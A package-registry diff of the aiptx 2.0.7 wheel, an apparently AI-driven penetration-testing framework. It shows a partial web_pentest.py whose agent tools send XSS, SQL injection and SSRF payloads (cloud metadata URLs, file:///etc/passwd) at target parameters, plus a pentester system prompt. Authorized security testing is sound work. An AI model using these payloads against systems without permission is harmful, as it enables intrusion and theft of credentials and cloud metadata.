aiptx 2.0.7__py3-none-any.whl
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- aipt_v2/__init__.py +110 -0
- aipt_v2/__main__.py +24 -0
- aipt_v2/agents/AIPTxAgent/__init__.py +10 -0
- aipt_v2/agents/AIPTxAgent/aiptx_agent.py +211 -0
- aipt_v2/agents/__init__.py +46 -0
- aipt_v2/agents/base.py +520 -0
- aipt_v2/agents/exploit_agent.py +688 -0
- aipt_v2/agents/ptt.py +406 -0
- aipt_v2/agents/state.py +168 -0
- aipt_v2/app.py +957 -0
- aipt_v2/browser/__init__.py +31 -0
- aipt_v2/browser/automation.py +458 -0
- aipt_v2/browser/crawler.py +453 -0
- aipt_v2/cli.py +2933 -0
- aipt_v2/compliance/__init__.py +71 -0
- aipt_v2/compliance/compliance_report.py +449 -0
- aipt_v2/compliance/framework_mapper.py +424 -0
- aipt_v2/compliance/nist_mapping.py +345 -0
- aipt_v2/compliance/owasp_mapping.py +330 -0
- aipt_v2/compliance/pci_mapping.py +297 -0
- aipt_v2/config.py +341 -0
- aipt_v2/core/__init__.py +43 -0
- aipt_v2/core/agent.py +630 -0
- aipt_v2/core/llm.py +395 -0
- aipt_v2/core/memory.py +305 -0
- aipt_v2/core/ptt.py +329 -0
- aipt_v2/database/__init__.py +14 -0
- aipt_v2/database/models.py +232 -0
- aipt_v2/database/repository.py +384 -0
- aipt_v2/docker/__init__.py +23 -0
- aipt_v2/docker/builder.py +260 -0
- aipt_v2/docker/manager.py +222 -0
- aipt_v2/docker/sandbox.py +371 -0
- aipt_v2/evasion/__init__.py +58 -0
- aipt_v2/evasion/request_obfuscator.py +272 -0
- aipt_v2/evasion/tls_fingerprint.py +285 -0
- aipt_v2/evasion/ua_rotator.py +301 -0
- aipt_v2/evasion/waf_bypass.py +439 -0
- aipt_v2/execution/__init__.py +23 -0
- aipt_v2/execution/executor.py +302 -0
- aipt_v2/execution/parser.py +544 -0
- aipt_v2/execution/terminal.py +337 -0
- aipt_v2/health.py +437 -0
- aipt_v2/intelligence/__init__.py +194 -0
- aipt_v2/intelligence/adaptation.py +474 -0
- aipt_v2/intelligence/auth.py +520 -0
- aipt_v2/intelligence/chaining.py +775 -0
- aipt_v2/intelligence/correlation.py +536 -0
- aipt_v2/intelligence/cve_aipt.py +334 -0
- aipt_v2/intelligence/cve_info.py +1111 -0
- aipt_v2/intelligence/knowledge_graph.py +590 -0
- aipt_v2/intelligence/learning.py +626 -0
- aipt_v2/intelligence/llm_analyzer.py +502 -0
- aipt_v2/intelligence/llm_tool_selector.py +518 -0
- aipt_v2/intelligence/payload_generator.py +562 -0
- aipt_v2/intelligence/rag.py +239 -0
- aipt_v2/intelligence/scope.py +442 -0
- aipt_v2/intelligence/searchers/__init__.py +5 -0
- aipt_v2/intelligence/searchers/exploitdb_searcher.py +523 -0
- aipt_v2/intelligence/searchers/github_searcher.py +467 -0
- aipt_v2/intelligence/searchers/google_searcher.py +281 -0
- aipt_v2/intelligence/tools.json +443 -0
- aipt_v2/intelligence/triage.py +670 -0
- aipt_v2/interactive_shell.py +559 -0
- aipt_v2/interface/__init__.py +5 -0
- aipt_v2/interface/cli.py +230 -0
- aipt_v2/interface/main.py +501 -0
- aipt_v2/interface/tui.py +1276 -0
- aipt_v2/interface/utils.py +583 -0
- aipt_v2/llm/__init__.py +39 -0
- aipt_v2/llm/config.py +26 -0
- aipt_v2/llm/llm.py +514 -0
- aipt_v2/llm/memory.py +214 -0
- aipt_v2/llm/request_queue.py +89 -0
- aipt_v2/llm/utils.py +89 -0
- aipt_v2/local_tool_installer.py +1467 -0
- aipt_v2/models/__init__.py +15 -0
- aipt_v2/models/findings.py +295 -0
- aipt_v2/models/phase_result.py +224 -0
- aipt_v2/models/scan_config.py +207 -0
- aipt_v2/monitoring/grafana/dashboards/aipt-dashboard.json +355 -0
- aipt_v2/monitoring/grafana/dashboards/default.yml +17 -0
- aipt_v2/monitoring/grafana/datasources/prometheus.yml +17 -0
- aipt_v2/monitoring/prometheus.yml +60 -0
- aipt_v2/orchestration/__init__.py +52 -0
- aipt_v2/orchestration/pipeline.py +398 -0
- aipt_v2/orchestration/progress.py +300 -0
- aipt_v2/orchestration/scheduler.py +296 -0
- aipt_v2/orchestrator.py +2427 -0
- aipt_v2/payloads/__init__.py +27 -0
- aipt_v2/payloads/cmdi.py +150 -0
- aipt_v2/payloads/sqli.py +263 -0
- aipt_v2/payloads/ssrf.py +204 -0
- aipt_v2/payloads/templates.py +222 -0
- aipt_v2/payloads/traversal.py +166 -0
- aipt_v2/payloads/xss.py +204 -0
- aipt_v2/prompts/__init__.py +60 -0
- aipt_v2/proxy/__init__.py +29 -0
- aipt_v2/proxy/history.py +352 -0
- aipt_v2/proxy/interceptor.py +452 -0
- aipt_v2/recon/__init__.py +44 -0
- aipt_v2/recon/dns.py +241 -0
- aipt_v2/recon/osint.py +367 -0
- aipt_v2/recon/subdomain.py +372 -0
- aipt_v2/recon/tech_detect.py +311 -0
- aipt_v2/reports/__init__.py +17 -0
- aipt_v2/reports/generator.py +313 -0
- aipt_v2/reports/html_report.py +378 -0
- aipt_v2/runtime/__init__.py +53 -0
- aipt_v2/runtime/base.py +30 -0
- aipt_v2/runtime/docker.py +401 -0
- aipt_v2/runtime/local.py +346 -0
- aipt_v2/runtime/tool_server.py +205 -0
- aipt_v2/runtime/vps.py +830 -0
- aipt_v2/scanners/__init__.py +28 -0
- aipt_v2/scanners/base.py +273 -0
- aipt_v2/scanners/nikto.py +244 -0
- aipt_v2/scanners/nmap.py +402 -0
- aipt_v2/scanners/nuclei.py +273 -0
- aipt_v2/scanners/web.py +454 -0
- aipt_v2/scripts/security_audit.py +366 -0
- aipt_v2/setup_wizard.py +941 -0
- aipt_v2/skills/__init__.py +80 -0
- aipt_v2/skills/agents/__init__.py +14 -0
- aipt_v2/skills/agents/api_tester.py +706 -0
- aipt_v2/skills/agents/base.py +477 -0
- aipt_v2/skills/agents/code_review.py +459 -0
- aipt_v2/skills/agents/security_agent.py +336 -0
- aipt_v2/skills/agents/web_pentest.py +818 -0
- aipt_v2/skills/prompts/__init__.py +647 -0
- aipt_v2/system_detector.py +539 -0
- aipt_v2/telemetry/__init__.py +7 -0
- aipt_v2/telemetry/tracer.py +347 -0
- aipt_v2/terminal/__init__.py +28 -0
- aipt_v2/terminal/executor.py +400 -0
- aipt_v2/terminal/sandbox.py +350 -0
- aipt_v2/tools/__init__.py +44 -0
- aipt_v2/tools/active_directory/__init__.py +78 -0
- aipt_v2/tools/active_directory/ad_config.py +238 -0
- aipt_v2/tools/active_directory/bloodhound_wrapper.py +447 -0
- aipt_v2/tools/active_directory/kerberos_attacks.py +430 -0
- aipt_v2/tools/active_directory/ldap_enum.py +533 -0
- aipt_v2/tools/active_directory/smb_attacks.py +505 -0
- aipt_v2/tools/agents_graph/__init__.py +19 -0
- aipt_v2/tools/agents_graph/agents_graph_actions.py +69 -0
- aipt_v2/tools/api_security/__init__.py +76 -0
- aipt_v2/tools/api_security/api_discovery.py +608 -0
- aipt_v2/tools/api_security/graphql_scanner.py +622 -0
- aipt_v2/tools/api_security/jwt_analyzer.py +577 -0
- aipt_v2/tools/api_security/openapi_fuzzer.py +761 -0
- aipt_v2/tools/browser/__init__.py +5 -0
- aipt_v2/tools/browser/browser_actions.py +238 -0
- aipt_v2/tools/browser/browser_instance.py +535 -0
- aipt_v2/tools/browser/tab_manager.py +344 -0
- aipt_v2/tools/cloud/__init__.py +70 -0
- aipt_v2/tools/cloud/cloud_config.py +273 -0
- aipt_v2/tools/cloud/cloud_scanner.py +639 -0
- aipt_v2/tools/cloud/prowler_tool.py +571 -0
- aipt_v2/tools/cloud/scoutsuite_tool.py +359 -0
- aipt_v2/tools/executor.py +307 -0
- aipt_v2/tools/parser.py +408 -0
- aipt_v2/tools/proxy/__init__.py +5 -0
- aipt_v2/tools/proxy/proxy_actions.py +103 -0
- aipt_v2/tools/proxy/proxy_manager.py +789 -0
- aipt_v2/tools/registry.py +196 -0
- aipt_v2/tools/scanners/__init__.py +343 -0
- aipt_v2/tools/scanners/acunetix_tool.py +712 -0
- aipt_v2/tools/scanners/burp_tool.py +631 -0
- aipt_v2/tools/scanners/config.py +156 -0
- aipt_v2/tools/scanners/nessus_tool.py +588 -0
- aipt_v2/tools/scanners/zap_tool.py +612 -0
- aipt_v2/tools/terminal/__init__.py +5 -0
- aipt_v2/tools/terminal/terminal_actions.py +37 -0
- aipt_v2/tools/terminal/terminal_manager.py +153 -0
- aipt_v2/tools/terminal/terminal_session.py +449 -0
- aipt_v2/tools/tool_processing.py +108 -0
- aipt_v2/utils/__init__.py +17 -0
- aipt_v2/utils/logging.py +202 -0
- aipt_v2/utils/model_manager.py +187 -0
- aipt_v2/utils/searchers/__init__.py +269 -0
- aipt_v2/verify_install.py +793 -0
- aiptx-2.0.7.dist-info/METADATA +345 -0
- aiptx-2.0.7.dist-info/RECORD +187 -0
- aiptx-2.0.7.dist-info/WHEEL +5 -0
- aiptx-2.0.7.dist-info/entry_points.txt +7 -0
- aiptx-2.0.7.dist-info/licenses/LICENSE +21 -0
- aiptx-2.0.7.dist-info/top_level.txt +1 -0
|
@@ -0,0 +1,818 @@
|
|
|
1
|
+
"""
|
|
2
|
+
Web Penetration Testing Agent - AI-powered web application security assessment.
|
|
3
|
+
|
|
4
|
+
Performs comprehensive web application penetration testing including:
|
|
5
|
+
- Reconnaissance and information gathering
|
|
6
|
+
- Vulnerability scanning (XSS, SQLi, SSRF, etc.)
|
|
7
|
+
- Authentication and session testing
|
|
8
|
+
- Business logic testing
|
|
9
|
+
- Client-side security assessment
|
|
10
|
+
"""
|
|
11
|
+
|
|
12
|
+
import json
|
|
13
|
+
import re
|
|
14
|
+
import time
|
|
15
|
+
from typing import Any, Dict, List, Optional, Set
|
|
16
|
+
from urllib.parse import urljoin, urlparse, parse_qs
|
|
17
|
+
|
|
18
|
+
import structlog
|
|
19
|
+
|
|
20
|
+
from aipt_v2.skills.agents.base import (
|
|
21
|
+
AgentConfig,
|
|
22
|
+
AgentResult,
|
|
23
|
+
BaseSecurityAgent,
|
|
24
|
+
Finding,
|
|
25
|
+
Severity,
|
|
26
|
+
VulnCategory,
|
|
27
|
+
register_tool,
|
|
28
|
+
)
|
|
29
|
+
from aipt_v2.skills.prompts import SkillPrompts, VULNERABILITY_PROMPTS
|
|
30
|
+
|
|
31
|
+
logger = structlog.get_logger()
|
|
32
|
+
|
|
33
|
+
|
|
34
|
+
# Shared HTTP client (lazily created module-level singleton)
_http_client = None


def get_http_client():
    """Return the shared async HTTP client, creating it on first use.

    TLS verification is disabled deliberately: penetration-test targets
    frequently present self-signed or otherwise invalid certificates.
    """
    global _http_client
    if _http_client is not None:
        return _http_client

    import httpx
    _http_client = httpx.AsyncClient(
        timeout=30.0,
        follow_redirects=True,
        verify=False,
    )
    return _http_client
|
|
49
|
+
|
|
50
|
+
|
|
51
|
+
# Register web pentest tools
|
|
52
|
+
@register_tool(
    name="fetch_page",
    description="Fetch a web page and return HTML content with analysis",
    parameters={
        "url": {"type": "string", "description": "URL to fetch"},
        "headers": {"type": "object", "description": "Optional headers"},
        "method": {"type": "string", "description": "HTTP method (default: GET)"}
    },
    category="web_pentest"
)
async def fetch_page(
    url: str,
    headers: Optional[Dict[str, str]] = None,
    method: str = "GET"
) -> str:
    """Fetch a single page and summarize security-relevant details.

    The report covers security headers, forms, input fields, links,
    URL query parameters, inline script count, and a truncated body.

    Args:
        url: URL to fetch.
        headers: Optional extra request headers.
        method: HTTP method (default GET).

    Returns:
        Human-readable analysis, or an error message on failure.
    """
    try:
        client = get_http_client()
        response = await client.request(method=method, url=url, headers=headers)

        content_type = response.headers.get("content-type", "")

        # Snapshot of defensive headers; "MISSING" marks an absent header.
        csp = response.headers.get("content-security-policy")
        security_headers = {
            "X-Frame-Options": response.headers.get("x-frame-options", "MISSING"),
            "X-Content-Type-Options": response.headers.get("x-content-type-options", "MISSING"),
            "X-XSS-Protection": response.headers.get("x-xss-protection", "MISSING"),
            "Content-Security-Policy": csp[:100] if csp else "MISSING",
            "Strict-Transport-Security": response.headers.get("strict-transport-security", "MISSING"),
        }

        # Pull out the interesting injection surfaces with lightweight regexes.
        html = response.text
        form_blocks = re.findall(r'<form[^>]*>(.*?)</form>', html, re.DOTALL | re.IGNORECASE)
        input_tags = re.findall(r'<input[^>]*>', html, re.IGNORECASE)
        hrefs = re.findall(r'href=["\']([^"\']+)["\']', html, re.IGNORECASE)
        inline_scripts = re.findall(r'<script[^>]*>(.*?)</script>', html, re.DOTALL | re.IGNORECASE)

        # Query-string parameters are prime injection candidates.
        query_params = parse_qs(urlparse(url).query)

        newline = chr(10)
        report = f"""Page: {url}
Status: {response.status_code}
Content-Type: {content_type}

=== SECURITY HEADERS ===
{json.dumps(security_headers, indent=2)}

=== FORMS ({len(form_blocks)}) ===
{newline.join(block[:500] for block in form_blocks[:5])}

=== INPUT FIELDS ({len(input_tags)}) ===
{newline.join(input_tags[:20])}

=== LINKS ({len(hrefs)}) ===
{newline.join(hrefs[:30])}

=== URL PARAMETERS ===
{json.dumps(query_params, indent=2) if query_params else "None"}

=== INLINE SCRIPTS ({len(inline_scripts)}) ===
{len(inline_scripts)} script blocks found

=== RESPONSE BODY (truncated) ===
{html[:3000]}"""

        return report

    except Exception as e:
        return f"Failed to fetch page: {str(e)}"
|
|
121
|
+
|
|
122
|
+
|
|
123
|
+
@register_tool(
    name="spider_site",
    description="Spider a website to discover pages and endpoints",
    parameters={
        "start_url": {"type": "string", "description": "Starting URL to spider"},
        "max_pages": {"type": "integer", "description": "Maximum pages to crawl (default: 50)"},
        "same_domain": {"type": "boolean", "description": "Only crawl same domain (default: true)"}
    },
    category="web_pentest"
)
async def spider_site(
    start_url: str,
    max_pages: int = 50,
    same_domain: bool = True
) -> str:
    """Spider a website to discover URLs.

    Breadth-first crawl from ``start_url``, recording each fetched URL
    (status, content type, whether it carries query parameters) and any
    HTML forms found, up to ``max_pages`` pages.

    Args:
        start_url: Starting URL to spider.
        max_pages: Maximum number of pages to fetch.
        same_domain: When True, only URLs on start_url's host are crawled.

    Returns:
        Human-readable report of discovered URLs and forms.
    """
    try:
        import asyncio
        from collections import deque

        client = get_http_client()

        visited: Set[str] = set()
        # deque gives O(1) pops from the left (list.pop(0) was O(n));
        # the `queued` set gives O(1) frontier dedup (``in list`` was O(n)).
        to_visit = deque([start_url])
        queued: Set[str] = {start_url}
        found_urls: List[Dict[str, Any]] = []
        forms_found: List[Dict[str, Any]] = []

        base_domain = urlparse(start_url).netloc

        while to_visit and len(visited) < max_pages:
            url = to_visit.popleft()

            if url in visited:
                continue

            try:
                parsed = urlparse(url)
                # BUG FIX: never fetch non-HTTP(S) links (mailto:, javascript:,
                # tel:, ...) that the href regex inevitably picks up.
                if parsed.scheme not in ("http", "https"):
                    continue
                if same_domain and parsed.netloc != base_domain:
                    continue

                visited.add(url)
                response = await client.get(url, follow_redirects=True)

                # Record URL with metadata
                found_urls.append({
                    "url": url,
                    "status": response.status_code,
                    "content_type": response.headers.get("content-type", "unknown"),
                    "params": bool(parse_qs(parsed.query))
                })

                # Extract links (fragment-only hrefs are excluded by the regex)
                html = response.text
                links = re.findall(r'href=["\']([^"\'#]+)["\']', html, re.IGNORECASE)

                for link in links:
                    full_url = urljoin(url, link)
                    if full_url not in visited and full_url not in queued:
                        queued.add(full_url)
                        to_visit.append(full_url)

                # Extract forms (action + the input names inside each form)
                form_matches = re.findall(r'<form[^>]*action=["\']([^"\']*)["\'][^>]*>(.*?)</form>', html, re.DOTALL | re.IGNORECASE)
                for action, form_content in form_matches:
                    inputs = re.findall(r'<input[^>]*name=["\']([^"\']+)["\'][^>]*>', form_content, re.IGNORECASE)
                    forms_found.append({
                        "page": url,
                        "action": urljoin(url, action) if action else url,
                        "inputs": inputs
                    })

                await asyncio.sleep(0.1)  # Rate limiting

            except Exception as e:
                found_urls.append({"url": url, "error": str(e)})

        # Format results
        result = f"""Spider Results for {start_url}
Total URLs discovered: {len(found_urls)}
Forms found: {len(forms_found)}

=== URLS WITH PARAMETERS (High Priority) ===
"""
        urls_with_params = [u for u in found_urls if u.get("params")]
        for u in urls_with_params:
            result += f" {u['url']}\n"

        result += f"""
=== FORMS (Injection Targets) ===
"""
        for f in forms_found:
            result += f" Action: {f['action']}\n"
            result += f" Inputs: {', '.join(f['inputs'])}\n\n"

        result += f"""
=== ALL DISCOVERED URLS ===
"""
        for u in found_urls:
            if "error" in u:
                result += f" ERROR: {u['url']} - {u['error']}\n"
            else:
                result += f" [{u['status']}] {u['url']}\n"

        return result

    except Exception as e:
        return f"Spidering failed: {str(e)}"
|
|
227
|
+
|
|
228
|
+
|
|
229
|
+
@register_tool(
    name="test_xss",
    description="Test a URL/parameter for XSS vulnerabilities",
    parameters={
        "url": {"type": "string", "description": "URL to test"},
        "param": {"type": "string", "description": "Parameter name to inject into"},
        "method": {"type": "string", "description": "GET or POST (default: GET)"}
    },
    category="web_pentest"
)
async def test_xss(url: str, param: str, method: str = "GET") -> str:
    """Test for XSS vulnerabilities.

    Injects a battery of reflection payloads into ``param`` and checks
    whether each payload is echoed back raw (vulnerable) or only in
    HTML-escaped form (reflected but sanitized).

    Args:
        url: URL to test (may already contain a query string).
        param: Parameter name to inject into.
        method: "GET" or "POST".

    Returns:
        Human-readable report of payload-by-payload results.
    """
    try:
        client = get_http_client()
        import asyncio
        from urllib.parse import quote

        payloads = [
            "<script>alert('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            "<svg onload=alert('XSS')>",
            "javascript:alert('XSS')",
            "'\"><script>alert('XSS')</script>",
            "<body onload=alert('XSS')>",
            "'-alert('XSS')-'",
            "\"><img src=x onerror=alert('XSS')>",
        ]

        results = []

        for payload in payloads:
            try:
                if method.upper() == "GET":
                    # BUG FIX: URL-encode the payload so <, >, quotes and
                    # spaces survive transport intact.
                    encoded = quote(payload, safe="")
                    test_url = f"{url}?{param}={encoded}" if "?" not in url else f"{url}&{param}={encoded}"
                    response = await client.get(test_url)
                else:
                    response = await client.post(url, data={param: payload})

                body = response.text

                # Raw payload echoed verbatim -> exploitable reflection.
                reflected_raw = payload in body

                # BUG FIX: the original compared against a no-op
                # payload.replace("'", "'") and treated the PRESENCE of raw
                # "<script>"/"<img" as "sanitized", which inverted the
                # verdict and reported false negatives on real XSS.
                # "Sanitized" now means the HTML-escaped copy appears
                # while the raw payload does not.
                escaped = payload.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                sanitized = (not reflected_raw) and escaped != payload and escaped in body

                results.append({
                    "payload": payload,
                    "reflected": reflected_raw or sanitized,
                    "sanitized": sanitized,
                    "status": response.status_code,
                    "vulnerable": reflected_raw
                })

                await asyncio.sleep(0.1)

            except Exception as e:
                results.append({"payload": payload, "error": str(e)})

        # Format results
        vulnerable = [r for r in results if r.get("vulnerable")]

        output = f"""XSS Testing: {url}
Parameter: {param}
Method: {method}

"""
        if vulnerable:
            output += "🚨 VULNERABLE TO XSS!\n\n"
            output += "=== SUCCESSFUL PAYLOADS ===\n"
            for r in vulnerable:
                output += f" {r['payload']}\n"
        else:
            output += "No direct XSS found (may need context-specific payloads)\n"

        output += "\n=== ALL RESULTS ===\n"
        for r in results:
            if "error" in r:
                output += f" {r['payload']}: Error\n"
            else:
                status = "VULNERABLE" if r.get("vulnerable") else ("Reflected but sanitized" if r.get("reflected") else "Not reflected")
                output += f" {r['payload']}: {status}\n"

        return output

    except Exception as e:
        return f"XSS testing failed: {str(e)}"
|
|
313
|
+
|
|
314
|
+
|
|
315
|
+
@register_tool(
    name="test_sqli",
    description="Test a URL/parameter for SQL injection",
    parameters={
        "url": {"type": "string", "description": "URL to test"},
        "param": {"type": "string", "description": "Parameter name to test"},
        "method": {"type": "string", "description": "GET or POST"}
    },
    category="web_pentest"
)
async def test_sqli(url: str, param: str, method: str = "GET") -> str:
    """Test for SQL injection vulnerabilities.

    Establishes a baseline response, then sends error-based,
    boolean-based and time-based probes and compares each response
    against the baseline (error strings, delay, body-length delta).

    Args:
        url: URL to test (may already contain a query string).
        param: Parameter name to inject into.
        method: "GET" or "POST".

    Returns:
        Human-readable report listing any injection indicators.
    """
    try:
        client = get_http_client()
        import asyncio
        from urllib.parse import quote

        def build_url(value: str) -> str:
            # BUG FIX (consistency with test_xss): append to an existing
            # query string instead of emitting a second '?', and URL-encode
            # the payload so quotes/spaces/semicolons survive transport.
            sep = "&" if "?" in url else "?"
            return f"{url}{sep}{param}={quote(value, safe='')}"

        # Error-based, boolean-based and time-based payloads
        payloads = [
            ("'", "Single quote"),
            ("\"", "Double quote"),
            ("' OR '1'='1", "OR bypass"),
            ("' OR '1'='1'--", "OR bypass with comment"),
            ("1' AND '1'='1", "AND true"),
            ("1' AND '1'='2", "AND false"),
            ("' UNION SELECT NULL--", "UNION"),
            ("1; SELECT 1--", "Stacked query"),
            ("' OR SLEEP(5)--", "Time-based MySQL"),
            ("'; WAITFOR DELAY '0:0:5'--", "Time-based MSSQL"),
        ]

        results = []
        baseline_length = None
        baseline_time = None

        # Get baseline (benign value) for timing and length comparison
        try:
            start = time.time()
            if method.upper() == "GET":
                response = await client.get(build_url("1"))
            else:
                response = await client.post(url, data={param: "1"})
            baseline_time = time.time() - start
            baseline_length = len(response.text)
        except Exception:
            pass

        for payload, description in payloads:
            try:
                start = time.time()

                if method.upper() == "GET":
                    response = await client.get(build_url(payload))
                else:
                    response = await client.post(url, data={param: payload})

                elapsed = time.time() - start

                # Check for SQL error strings leaking into the response
                sql_errors = [
                    "sql syntax", "mysql", "sqlite", "postgresql", "oracle",
                    "microsoft sql", "odbc", "jdbc", "sql error", "syntax error",
                    "unterminated", "quoted string", "invalid query"
                ]
                error_found = any(err in response.text.lower() for err in sql_errors)

                # Check for time-based injection (~5s sleep payloads)
                time_based = elapsed > (baseline_time or 1) + 4 if baseline_time else elapsed > 5

                # Check for boolean-based (response length difference)
                length_diff = abs(len(response.text) - baseline_length) if baseline_length else 0

                results.append({
                    "payload": payload,
                    "description": description,
                    "status": response.status_code,
                    "error_based": error_found,
                    "time_based": time_based,
                    "time": elapsed,
                    "length": len(response.text),
                    "length_diff": length_diff
                })

                await asyncio.sleep(0.2)

            except Exception as e:
                # BUG FIX: include the description so the ALL RESULTS loop
                # below does not raise KeyError on error entries.
                results.append({"payload": payload, "description": description, "error": str(e)})

        # Analyze results
        vulnerable = [r for r in results if r.get("error_based") or r.get("time_based")]

        # BUG FIX: the baseline request may have failed, leaving
        # baseline_time as None; formatting None with :.2f raised TypeError
        # and made the whole function return a failure message.
        baseline_time_text = f"{baseline_time:.2f}s" if baseline_time is not None else "N/A"
        output = f"""SQL Injection Testing: {url}
Parameter: {param}
Method: {method}
Baseline response length: {baseline_length}
Baseline response time: {baseline_time_text}

"""
        if vulnerable:
            output += "🚨 POTENTIALLY VULNERABLE TO SQL INJECTION!\n\n"
            output += "=== INDICATORS ===\n"
            for r in vulnerable:
                indicator = "Error-based" if r.get("error_based") else "Time-based"
                output += f" {r['description']}: {indicator}\n"
                output += f" Payload: {r['payload']}\n"

        output += "\n=== ALL RESULTS ===\n"
        for r in results:
            if "error" in r:
                output += f" {r['description']}: Error - {r['error']}\n"
            else:
                indicators = []
                if r.get("error_based"):
                    indicators.append("SQL Error")
                if r.get("time_based"):
                    indicators.append(f"Delayed ({r['time']:.1f}s)")
                if r.get("length_diff", 0) > 100:
                    indicators.append(f"Length diff: {r['length_diff']}")

                status = ", ".join(indicators) if indicators else "No indicators"
                output += f" {r['description']}: {status}\n"

        return output

    except Exception as e:
        return f"SQLi testing failed: {str(e)}"
|
|
441
|
+
|
|
442
|
+
|
|
443
|
+
@register_tool(
    name="test_ssrf",
    description="Test for SSRF vulnerabilities",
    parameters={
        "url": {"type": "string", "description": "URL with parameter to test"},
        "param": {"type": "string", "description": "URL parameter name"},
        "callback_url": {"type": "string", "description": "Your callback URL for OOB detection (optional)"}
    },
    category="web_pentest"
)
async def test_ssrf(url: str, param: str, callback_url: Optional[str] = None) -> str:
    """Test for SSRF vulnerabilities.

    Injects internal/metadata-service URLs into ``param`` and looks for
    leaked internal data in the response, or network errors that suggest
    the server attempted an internal connection.

    Args:
        url: URL to test (may already contain a query string).
        param: Parameter name to inject into.
        callback_url: Optional attacker-controlled URL for out-of-band
            detection; check your callback logs separately.

    Returns:
        Human-readable report of payload-by-payload results.
    """
    try:
        client = get_http_client()
        import asyncio
        from urllib.parse import quote

        ssrf_payloads = [
            ("http://127.0.0.1", "Localhost"),
            ("http://localhost", "Localhost hostname"),
            ("http://[::1]", "IPv6 localhost"),
            ("http://0.0.0.0", "Zero address"),
            ("http://169.254.169.254/latest/meta-data/", "AWS metadata"),
            ("http://metadata.google.internal/", "GCP metadata"),
            ("http://169.254.169.254/metadata/instance", "Azure metadata"),
            ("file:///etc/passwd", "File protocol"),
            ("http://127.0.0.1:22", "SSH port"),
            ("http://127.0.0.1:3306", "MySQL port"),
        ]

        if callback_url:
            ssrf_payloads.append((callback_url, "OOB Callback"))

        results = []

        for payload, description in ssrf_payloads:
            try:
                # BUG FIX: append to an existing query string instead of
                # emitting a second '?', and URL-encode the payload so the
                # embedded URL (://, ?, #) is carried as a single parameter.
                sep = "&" if "?" in url else "?"
                test_url = f"{url}{sep}{param}={quote(payload, safe='')}"
                response = await client.get(test_url, timeout=10.0)

                # Strings that indicate the server fetched internal data
                ssrf_indicators = [
                    "root:", "uid=", "passwd", "shadow",  # File read
                    "ami-id", "instance-id", "hostname",  # AWS
                    "computeMetadata", "project-id",  # GCP
                    "vmId", "subscriptionId",  # Azure
                    "connection refused", "no route to host"  # Network errors suggesting internal access
                ]

                indicator_found = any(ind in response.text.lower() for ind in ssrf_indicators)

                results.append({
                    "payload": payload,
                    "description": description,
                    "status": response.status_code,
                    "length": len(response.text),
                    "indicator": indicator_found,
                    "preview": response.text[:200] if indicator_found else ""
                })

                await asyncio.sleep(0.2)

            except Exception as e:
                # Timeouts or connection errors might indicate internal network access
                error_msg = str(e).lower()
                internal_indicators = ["timeout", "connection refused", "no route", "unreachable"]
                possible_ssrf = any(ind in error_msg for ind in internal_indicators)

                results.append({
                    "payload": payload,
                    "description": description,
                    "error": str(e),
                    "possible_ssrf": possible_ssrf
                })

        # Format results
        vulnerable = [r for r in results if r.get("indicator") or r.get("possible_ssrf")]

        output = f"""SSRF Testing: {url}
Parameter: {param}

"""
        if vulnerable:
            output += "🚨 POTENTIAL SSRF DETECTED!\n\n"
            output += "=== INDICATORS ===\n"
            for r in vulnerable:
                if r.get("indicator"):
                    output += f" {r['description']}: Response contains internal data\n"
                    output += f" Preview: {r.get('preview', '')}\n"
                if r.get("possible_ssrf"):
                    output += f" {r['description']}: Network error suggests internal access attempt\n"

        output += "\n=== ALL RESULTS ===\n"
        for r in results:
            if "error" in r:
                status = "Possible SSRF" if r.get("possible_ssrf") else "Error"
                output += f" {r['description']}: {status}\n"
            else:
                status = "INDICATOR FOUND" if r.get("indicator") else f"Status {r['status']}"
                output += f" {r['description']}: {status}\n"

        return output

    except Exception as e:
        return f"SSRF testing failed: {str(e)}"
|
|
547
|
+
|
|
548
|
+
|
|
549
|
+
@register_tool(
    name="report_web_finding",
    description="Report a web security vulnerability",
    parameters={
        "title": {"type": "string"},
        "severity": {"type": "string"},
        "vuln_type": {"type": "string"},
        "url": {"type": "string"},
        "description": {"type": "string"},
        "payload": {"type": "string"},
        "evidence": {"type": "string"},
        "remediation": {"type": "string"},
        "cwe": {"type": "string"}
    },
    category="web_pentest"
)
async def report_web_finding(
    title: str,
    severity: str,
    vuln_type: str,
    url: str,
    description: str,
    payload: str,
    evidence: str,
    remediation: str,
    cwe: Optional[str] = None
) -> str:
    """Echo a formatted record of a web security finding.

    Evidence is truncated to 500 characters to keep the record compact;
    the CWE falls back to 'N/A' when not supplied.
    """
    record_lines = [
        "Web Security Finding Recorded:",
        f"Title: {title}",
        f"Severity: {severity}",
        f"Type: {vuln_type}",
        f"URL: {url}",
        f"CWE: {cwe or 'N/A'}",
        f"Description: {description}",
        f"Payload: {payload}",
        f"Evidence: {evidence[:500]}",
        f"Remediation: {remediation}",
    ]
    return "\n".join(record_lines) + "\n"
|
|
588
|
+
|
|
589
|
+
|
|
590
|
+
WEB_PENTEST_SYSTEM_PROMPT = """You are an expert web application penetration tester with deep knowledge of:
|
|
591
|
+
- OWASP Top 10 vulnerabilities
|
|
592
|
+
- Client-side security (XSS, CSRF, Clickjacking)
|
|
593
|
+
- Server-side security (SQLi, RCE, SSRF, XXE)
|
|
594
|
+
- Authentication and session management
|
|
595
|
+
- Business logic flaws
|
|
596
|
+
|
|
597
|
+
## TESTING METHODOLOGY
|
|
598
|
+
|
|
599
|
+
### Phase 1: Reconnaissance
|
|
600
|
+
- Spider the target to discover all pages and endpoints
|
|
601
|
+
- Identify forms, inputs, and parameters
|
|
602
|
+
- Analyze security headers
|
|
603
|
+
- Check robots.txt, sitemap.xml
|
|
604
|
+
|
|
605
|
+
### Phase 2: Input Vector Testing
|
|
606
|
+
For each input discovered:
|
|
607
|
+
1. Test for XSS (reflected, stored, DOM)
|
|
608
|
+
2. Test for SQL injection
|
|
609
|
+
3. Test for command injection
|
|
610
|
+
4. Test for path traversal
|
|
611
|
+
|
|
612
|
+
### Phase 3: Authentication & Session
|
|
613
|
+
- Test for weak credentials
|
|
614
|
+
- Check session token randomness
|
|
615
|
+
- Test session fixation
|
|
616
|
+
- Test logout functionality
|
|
617
|
+
|
|
618
|
+
### Phase 4: Authorization
|
|
619
|
+
- Test for IDOR
|
|
620
|
+
- Check horizontal privilege escalation
|
|
621
|
+
